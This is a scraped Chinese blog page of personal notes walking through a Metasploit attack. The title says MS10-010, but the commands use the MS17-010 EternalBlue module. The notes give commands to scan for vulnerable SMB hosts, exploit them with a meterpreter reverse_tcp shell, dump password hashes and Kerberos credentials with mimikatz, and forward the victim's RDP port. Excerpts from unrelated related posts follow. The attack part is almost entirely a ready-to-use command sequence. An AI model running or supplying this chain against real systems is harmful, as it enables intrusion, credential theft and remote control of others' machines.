msf ms10-010利用笔记

nmap -sV -Pn xxxxx  扫描端口and系统信息

use auxiliary/scanner/smb/smb_ms17_010   扫描模块

set Rhosts 扫描目标

use exploit/windows/smb/ms17_010_eternalblue   攻击模块

需要设置目标ip

RHOST

本机IP LHost

攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

load mimikatz  加载mimikatz

msv导出hash

kerberos 获取账户密码

端口转发-

portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r xxxxx目标ip

将目标的3389转发到本机3389上

原文地址:https://www.cnblogs.com/chaoba/p/8947391.html

时间: 2024-10-31 07:09:03

msf ms10-010利用笔记的相关文章

CVE-2017-11882漏洞 Msf利用复现

中午时候收到了推送的漏洞预警,在网上搜索相关信息看到很多大牛已经开发出生成doc文档的脚本和msf的poc,本文记录CVE-2017-11882 漏洞在 Msf下的利用. 0x00 漏洞简介 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882).该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本.攻击者可以利用漏洞以当前登录的用户的身份执行任意命令. 由于漏洞影响

IE UAF 漏洞(CVE-2012-4969)漏洞分析与利用

简介 首先这是一个IE的UAF的漏洞,由于IE 6至9版本中的mshtml.dll中的CMshtmlEd::Exec函数中存在释放后使用漏洞,可导致任意代码执行. 本文包含了分析与利用,包含了对象的申请,对象在何时释放,什么时候被占位等,在漏洞利用方面,metasploit生成的exp的heap Spray有点难看,就自己根据自己的经验写了exp 实验环境 Windows 7 Sp1 32位 IE 8 windbg IDA mona 漏洞分析 获得exp(poc) 搜了一下metasploit那

2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用

2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用 --------CONTENTS-------- 一.原理与实践说明 1.实践内容 2.预备知识 3.基础问题 二.实践过程记录 1.Windows服务渗透攻击--MS08-067安全漏洞 2.浏览器渗透攻击--MS11-050 3.针对Office软件的渗透攻击--MS10-087 4.针对Adobe Reader软件的渗透攻击--adobe_toolbutton 5.快捷方式图标漏洞--ms10-046 6.M

20154309 【网络对抗技术】Exp5:MSF基础应用

20154309 [网络对抗技术]Exp5:MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,掌握重点常用的三种攻击方式的思路.具体需要完成: · 一个主动攻击实践,如ms08-067; (1分) · 一个针对浏览器的攻击,如ms11-050:(1分) · 一个针对客户端的攻击,如Adobe:(1分) · 成功应用任何一个辅助模块.(0.5分) 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分. 2.预

MS12-020漏洞复现及自动化批量利用

漏洞描述 Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏.(RDP远程桌面执行代码漏洞) 影响目标 Windows XP sp3 Windows xp sp2 Windows Vista sp2 Windows 7 Windows Server 2003 Windows Server 2008 Windows Server 2008 R2 msfpayload利用 msfconsole use auxiliary/dos/windows/rdp/ms12_020_maxchann

2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 payload:generic/shell_bind_tcp(成功且唯一) ms17_010_eternalblue:"永恒之蓝"自动化攻击 payload:windows/x64/shell/reverse_tcp_uuid(成功且唯一) 攻击浏览器的实践 ms10_046

《HTML 5网页开发实例详解》目录

第一篇  从宏观上认识HTML 5 讲述了HTML 5引发的Web革命.HTML 5的整体特性.HTML 5相关概念和框架和开发环境搭建. 第1章 HTML 5引发的Web革命 1.1  你是不是真的了解HTML 5 1.1.1  通过W3C认识HTML 5的发展史 1.1.2  HTML 5.HTML4.XHTML的区别 1.1.3  什么人应该学HTML 5 1.1.4  一个图告诉你如何学习HTML 5 1.2  浏览器之争 1.2.1  说说这些常见的浏览器 1.2.2  浏览器的兼容烦

MS14-068域权限提升漏洞总结

0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票.银票是一张tgs,也就是一张服务票据.服务票据是客户端直接发送给服务器,并请求服务资源的.如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器.所以ms14-068的来源和银票是息息相关的. 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许域内任何一个普通用户,将自己提升至域管权限.微软给出的补丁是kb3011780.在server 2000以上的

如何总结和整理学术文献?

nerfing ,爱科学爱文学 收录于 知乎圆桌 . 编辑推荐 •袁霖等 2118 人赞同 第一次在知乎答题... 我认为整理文献的主要目的就是:能够在任何条件下,快速找到所需信息.任何好用的软件,都不如大批量多批次的文献阅读. 我的思路是:轻整理,重搜索.轻整理,是指不对文献分类,或者只是对文献简单分类.重搜索,是指利用不同的搜索工具,快速定位到我需要的文献.我认为在现在搜索技术已经很强大的情况下,如果利用笔记等手段整理,反而容易造成条条框框,在对于一篇文献关注太长的时间,不利于提高效率.在日